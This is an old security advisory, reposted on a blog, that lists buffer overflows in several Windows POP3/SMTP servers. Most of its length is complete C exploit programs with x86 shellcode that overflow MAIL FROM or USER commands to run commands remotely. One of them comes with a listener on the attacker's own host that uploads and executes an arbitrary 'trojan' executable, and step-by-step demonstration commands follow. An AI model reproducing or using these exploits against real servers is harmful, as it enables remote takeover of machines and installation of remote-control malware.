Many kind of POP3/SMTP server softwares for Windows have buffer overflow bug
(by The Shadow Penguin Securuty http://shadowpenguin.backsection.net)

1. Introduction

I confirmed many kind of POP3/SMTP servers for Windows which are published on
"SOFT-SEEK.com" contain the buffer overflow bugs. I list the softwares which
have buffer overflow bug, I also publish the exploit programs for some software.

2. POP3/SMTP server softwares which have buffer overflow bugs

Software Version Service Overflow Point
-------------------------------------------------------
@Work SmartServer3 3.51 SMTP long MAIL FROM:
CMail Server 2.3 SP2 SMTP long MAIL FROM:
Personal Mail Server 3.09 SMTP long MAIL FROM: (I've notified to developer)
Tiny FTP daemon 0.51 POP3 long USER (I've notified, Now fixed)
Internet Anywhere 2.2.2 POP3 long USER
FuseMail 2.7 POP3 long USER,PASS
aVirt Mail Server 3.3 POP/SMTP long MAIL FROM:,long USER

If the host recives the packet which contains the exploit code, the host has been
cracked by any instructions which are coded in the exploit code. We show the
demonstration programs which execute any command on the victim host. For the proof
of the risk of intrusion, I also publish the exploit program for
"Personal Mail Server" that can send a prepared program to victim host and execute
it. If the trojan program is sent, the victim machine will be controlled remotely.

If the host receives the packet which contains the exploit code, the host will
execute any instructions that is written in the exploit code. We show the
demonstration programs which execute any command on the victim host. For the
proof of the risk of intrusion, I publish the exploit program for
"Personal Mail Server" that can send a trojan program which is prepared in the
attacker host. Of course, it can be executed remotely. If the trojan program is
sent, the victim machine will be controlled remotely.


3. Exploit

I coded the exploits for the following softwares:

(1) @Work SmartServer3
(2) CMail Server
(3) FuseMail 2.7
(4) Personal Mail Server
(5) Tiny FTP daemon

(5) is now fixed, I publish the exploit program for (1)-(4)

-------------------

(1) @Work SmartServer3

/*=============================================================================
NetcPlus SmartServer3 Exploit for Windows98
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin backsection net)
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>

#define BUFSIZE 2000
#define SMTP_PORT 25
#define RETADR 1167
#define JMPADR 1163
#define JMPOFS 6
#define EIP 0xbff7a06b
#define NOP 0x90
#define JMPS 0xeb

unsigned char exploit_code[200]={
0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,
0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF,
0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7,
0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,
0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,
0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,
0xFF,0x00};
unsigned char cmdbuf[200]="msvcrt.dll.system.exit.welcome.exe";

int main(int argc,char *argv[])
{
struct hostent *hs;
struct sockaddr_in cli;
char packetbuf[BUFSIZE+3000],buf[BUFSIZE];
int sockfd,i,ip;

if (argc<2){
printf("usage\n %s HostName\n",argv[0]);
exit(1);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(SMTP_PORT);
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified host.\n");
exit(1);
}
cli.sin_family = hs->h_addrtype;
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
}

if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket"); exit(0);
}

if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect"); exit(0);
}
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}

strcat(exploit_code,cmdbuf);
exploit_code[65]=strlen(cmdbuf+23);
memset(buf,0x90,BUFSIZE);
ip=EIP;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
buf[JMPADR] =JMPS;
buf[JMPADR+1]=JMPOFS;
memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
buf[2000]=0;

sprintf(packetbuf,"helo penguin\r\n");
write(sockfd,packetbuf,strlen(packetbuf));
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
printf("%s\n",packetbuf);
sprintf(packetbuf,"MAIL FROM: %s\r\n",buf);
write(sockfd,packetbuf,strlen(packetbuf));
sleep(100);
close(sockfd);
}

-------------------

(2) CMail Server

/*=============================================================================
CMAIL Server 2.3 SP2 Exploit for Windows98
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin backsection net)
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>

#define BUFSIZE 2000
#define SMTP_PORT 25
#define RETADR 626
#define JMPADR 622
#define JMPOFS 6
#define EIP 0xbff7a06b
#define NOP 0x90
#define JMPS 0xeb

unsigned char exploit_code[200]={
0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,
0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF,
0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7,
0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,
0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,
0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,
0xFF, 0x00};
unsigned char cmdbuf[200]="msvcrt.dll.system.exit.welcome.exe";

int main(int argc,char *argv[])
{
struct hostent *hs;
struct sockaddr_in cli;
char packetbuf[BUFSIZE+3000],buf[BUFSIZE];
int sockfd,i,ip;

if (argc<2){
printf("usage\n %s HostName\n",argv[0]);
exit(1);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(SMTP_PORT);
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified host.\n");
exit(1);
}
cli.sin_family = hs->h_addrtype;
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
}

if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket"); exit(0);
}

if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect"); exit(0);
}
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}

strcat(exploit_code,cmdbuf);
exploit_code[65]=strlen(cmdbuf+23);
memset(buf,0x90,BUFSIZE);
ip=EIP;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
buf[JMPADR] =JMPS;
buf[JMPADR+1]=JMPOFS;
memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
buf[BUFSIZE]=0;

sprintf(packetbuf,"helo penguin\r\n");
write(sockfd,packetbuf,strlen(packetbuf));
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
printf("%s\n",packetbuf);
sprintf(packetbuf,"MAIL FROM: aa <%s aa com>\r\n",buf);
write(sockfd,packetbuf,strlen(packetbuf));
sleep(100);
close(sockfd);
}

-------------------

(4) FuseMail 2.7

/*=============================================================================
FuseMail Version 2.7 Exploit for Windows98
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin backsection net)
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>

#define BUFSIZE 1159
#define RETADR 1074
#define FTP_PORT 110
#define JMP_ESP 0xbff7a027

unsigned char exploit_code[200]={
0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3,
0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,
0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF,
0xFF,0x00
};
unsigned char cmdbuf[200]="msvcrt.dll.system.notepad.exe";

int main(int argc,char *argv[])
{
struct hostent *hs;
struct sockaddr_in cli;
char packetbuf[3000],buf[1500];
int sockfd,i,ip;

if (argc<2){
printf("usage\n %s HostName\n",argv[0]);
exit(1);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(FTP_PORT);
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified host.\n");
exit(1);
}
cli.sin_family = hs->h_addrtype;
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
}

if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket"); exit(0);
}

if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect"); exit(0);
}
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}

strcat(exploit_code,cmdbuf);
memset(buf,'a',BUFSIZE);
buf[BUFSIZE]=0;
ip=JMP_ESP;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
strncpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
sprintf(packetbuf,"USER %s\r\n",buf);
write(sockfd,packetbuf,strlen(packetbuf));

while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}

memset(packetbuf,0,1024);
sprintf(packetbuf,"PASS sample\r\n");
write(sockfd,packetbuf,strlen(packetbuf));

close(sockfd);
}

-------------------

(4) Personal Mail Server

Prog.1 : This program sends the very small client program which can execute the trojan
after the translation from other host.
Prog.2 : Program Translation Server. The Program Translation Server which is used
by Prog.1


Prog.1

/*=============================================================================
Personal Mail Server Version 3.072-3.09 Exploit for Windows98
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin backsection net)
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>

#define BUFSIZE 4000
#define SMTP_PORT 25
#define RETADR 267
#define JMPADR 263
#define JMPOFS 6
#define EIP 0xbff7a06b
#define NOP 0x90
#define JMPS 0xeb

unsigned char exploit_code[700]={
0xEB,0x58,0x5F,0x32,0xC0,0x8B,0xDF,0x33,0xC9,0xB1,0x09,0xFE,0xC1,0x03,0xD9,0x88,
0x03,0x88,0x47,0x16,0x88,0x47,0x21,0x88,0x47,0x28,0x88,0x47,0x30,0x88,0x47,0x35,
0x88,0x47,0x41,0x88,0x47,0x47,0x88,0x47,0x4E,0x88,0x47,0x55,0x88,0x47,0x58,0x88,
0x47,0x5E,0x88,0x47,0x65,0x88,0x47,0x6A,0x8B,0xC7,0x50,0xB8,0x50,0x77,0xF7,0xBF,
0xFF,0xD0,0x89,0x47,0x6E,0x8B,0xC7,0x33,0xC9,0xB1,0x0B,0x03,0xC1,0x50,0xB8,0x50,
0x77,0xF7,0xBF,0xFF,0xD0,0x89,0x47,0x72,0xEB,0x02,0xEB,0x72,0x8B,0xC7,0x33,0xC9,
0xB1,0x17,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,
0xF0,0x8B,0xC7,0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0x33,0xC0,0xB0,0x02,0x50,0xFF,
0xD6,0x57,0x33,0xC9,0xB1,0x82,0x03,0xF9,0x33,0xC9,0x66,0xB9,0x90,0x01,0x33,0xC0,
0xF3,0xAA,0x5F,0x8B,0xC7,0x33,0xC9,0xB1,0x22,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,
0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0x50,0x40,0x50,0x40,0x50,0xFF,
0xD6,0x89,0x47,0x76,0x8B,0xDF,0x33,0xC9,0xB1,0x82,0x03,0xD9,0xC6,0x03,0x02,0x66,
0xC7,0x43,0x02,0x1B,0x58,0xC7,0x43,0x04,0xEE,0xEE,0xEE,0xEE,0xEB,0x02,0xEB,0x56,
0x8B,0xC7,0x33,0xC9,0xB1,0x29,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,
0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0xB0,0x10,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x82,
0x03,0xC1,0x50,0xFF,0x77,0x76,0xFF,0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x42,0x03,0xC1,
0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x8B,0xC7,0x33,
0xC9,0xB1,0x56,0x03,0xC1,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x59,0x03,0xC1,0x50,0xFF,
0xD6,0x89,0x47,0x7A,0xEB,0x02,0xEB,0x63,0x8B,0xC7,0x33,0xC9,0xB1,0x31,0x03,0xC1,
0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0x50,
0x66,0xB8,0xE8,0x03,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0xFF,0x77,
0x76,0xFF,0xD6,0x89,0x47,0x7E,0x33,0xDB,0x3B,0xC3,0x74,0x31,0x72,0x2F,0x8B,0xC7,
0x33,0xC9,0xB1,0x48,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,
0xD0,0x8B,0xF0,0xFF,0x77,0x7A,0xFF,0x77,0x7E,0x33,0xC0,0xB0,0x01,0x50,0x8B,0xC7,
0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0xFF,0xD6,0xEB,0x9D,0xEB,0x6C,0x8B,0xC7,0x33,
0xC9,0xB1,0x36,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,
0x8B,0xF0,0xFF,0x77,0x76,0xFF,0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x4F,0x03,0xC1,0x50,
0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0xFF,0x77,0x7A,0xFF,
0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x5F,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x8B,0xC7,0x33,0xC9,0xB1,0x59,0x03,0xC1,0x50,0xFF,
0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x66,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0x53,0xFF,0xD0,0x90,0xE8,0x03,0xFE,0xFF,0xFF,0x6D,
0x73,0x76,0x63,0x72,0x74,0x2E,0x64,0x6C,0x6C,0x2C,0x77,0x73,0x6F,0x63,0x6B,0x33,
0x32,0x2E,0x64,0x6C,0x6C,0x2C,0x57,0x53,0x41,0x53,0x74,0x61,0x72,0x74,0x75,0x70,
0x2C,0x73,0x6F,0x63,0x6B,0x65,0x74,0x2C,0x63,0x6F,0x6E,0x6E,0x65,0x63,0x74,0x2C,
0x72,0x65,0x63,0x76,0x2C,0x63,0x6C,0x6F,0x73,0x65,0x73,0x6F,0x63,0x6B,0x65,0x74,
0x2C,0x66,0x6F,0x70,0x65,0x6E,0x2C,0x66,0x77,0x72,0x69,0x74,0x65,0x2C,0x66,0x63,
0x6C,0x6F,0x73,0x65,0x2C,0x77,0x62,0x2C,0x78,0x2E,0x65,0x78,0x65,0x2C,0x73,0x79,
0x73,0x74,0x65,0x6D,0x2C,0x65,0x78,0x69,0x74,0x2C,0x2C,0x2C,0x2C,0x00
};

int main(int argc,char *argv[])
{
struct hostent *hs;
struct sockaddr_in cli;
char packetbuf[BUFSIZE+3000],buf[BUFSIZE];
int sockfd,i;
unsigned int ip,port,yourip;

if (argc<3){
printf("usage\n %s VictimHostName YourHostName\n",argv[0]);
exit(1);
}
if ((yourip=inet_addr(argv[2]))==-1){
if ((hs=gethostbyname(argv[2]))==NULL){
printf("Can not resolve specified YourHost.\n");
exit(1);
}
memcpy((caddr_t)&yourip,hs->h_addr,hs->h_length);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(SMTP_PORT);
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified VictimHost.\n");
exit(1);
}
cli.sin_family = hs->h_addrtype;
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
}

if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket"); exit(0);
}

if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect"); exit(0);
}
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
printf("1:%s\n",packetbuf);

memset(buf,0x90,BUFSIZE);
for (i=267;i<271;i++) buf[i]=0x30;
ip=EIP;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
buf[JMPADR] =JMPS;
buf[JMPADR+1]=JMPOFS;

port=7000;
exploit_code[0xc3]=(port>>8) & 0xff;
exploit_code[0xc4]=port & 0xff;
ip=htonl(yourip);
exploit_code[0xc8]=(ip>>24) & 0xff;
exploit_code[0xc9]=(ip>>16) & 0xff;
exploit_code[0xca]=(ip>>8) & 0xff;
exploit_code[0xcb]=ip & 0xff;

memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
buf[BUFSIZE]=0;

sprintf(packetbuf,"helo penguin\r\n");
write(sockfd,packetbuf,strlen(packetbuf));
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
printf("%s\n",packetbuf);
sprintf(packetbuf,"MAIL FROM: %s\r\n",buf);
write(sockfd,packetbuf,strlen(packetbuf));
close(sockfd);
}

Prog.2

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define PORT_NUM 7000
#define BUFSIZE 1000
#define SENDFILE "test.exe"

int get_connection(port, listener)
int port;
int *listener;
{
struct sockaddr_in address,acc;
int listening_socket,connected_socket;
int reuse_addr=1,acclen=sizeof(acc);

memset((char *) &address, 0, sizeof(address));
address.sin_family = AF_INET;
address.sin_port = htons(port);
address.sin_addr.s_addr = htonl(INADDR_ANY);
listening_socket = socket(AF_INET, SOCK_STREAM, 0);
if (listening_socket < 0) {
perror("socket"); exit(1);
}
if (listener != NULL) *listener = listening_socket;
setsockopt(listening_socket,SOL_SOCKET,SO_REUSEADDR,
(void *)&reuse_addr,sizeof(reuse_addr));
if (bind(listening_socket,(struct sockaddr *)&address,
sizeof(address))<0){
perror("bind"); exit(1);
}
listen(listening_socket, 5);
connected_socket=accept(listening_socket,
(struct sockaddr *)&acc,&acclen);
return connected_socket;
}
int main(argc, argv)
int argc;
char *argv[];
{
int sock,listensock,i,r,l;
char buf[BUFSIZE];
struct stat st;
FILE *fp;

if ((fp=fopen(SENDFILE,"rb"))==NULL){
printf("File not found \"%s\"\n",SENDFILE);
exit(1);
}
stat(SENDFILE,&st);
r=st.st_size/BUFSIZE+1;
sock = get_connection(PORT_NUM, &listensock);
for (i=0;;i++){
l=fread(buf,1,BUFSIZE,fp);
if (l<=0) break;
write(sock,buf,l);
}
fclose(fp);
close(sock);
}

<< Demonstration >>

Victim host : 192.168.200.200
Your host : 192.168.100.100

(1) copy your testprogram "test.exe" to UNIX machine.
(2) gcc ex_pms1.c -o pms1
(3) gcc sendexp.c -o sendexp
(4) ./sendexp &
(5) ./pms1 192.168.200.200 192.168.100.100

You can send "test.exe" to victim host, and can execute it remotely.
The size of "test.exe" is not limited.

-----
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Webmaster / UNYUN (shadowpenguin backsection net)
posted on 2005-01-28 13:04  利刃  阅读(528)  评论(0编辑  收藏  举报